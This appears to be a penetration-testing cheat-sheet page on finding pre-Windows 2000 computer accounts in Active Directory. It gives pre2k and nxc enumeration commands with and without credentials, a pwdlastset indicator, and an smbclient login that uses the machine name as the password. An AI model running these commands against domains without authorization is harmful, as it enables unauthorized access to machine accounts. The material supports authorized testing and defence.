Skip to content

Pre Windows 2000 Computers

TL;DR:

Identify

Tools: pre2k, nxc

With creds 

pre2k auth -u <user> -d <DOMAIN> -p <pass> -dc-ip <dcip> -ldaps -save
or 
nxc ldap <dc-ip> -u 'user' -p 'pass' -M pre2k

Without creds 

pre2k unauth -d <DOMAIN> -dc-ip <dcip> -inputfile <listofcomputers> -save

Note

You can pass -n to check blank passwords as well

Manual mode

Without using the tool, you can check by identifying pwdlastset: 12/31/1600 7:00:00PM

Note

The only error that indicates an auth failure is KDC_ERR_PREAUTH_FAILED other errors do not mean you can't authenticate

Validate 

smbclient domain/machinename\$:machinename@dc-ip
Expected output: STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT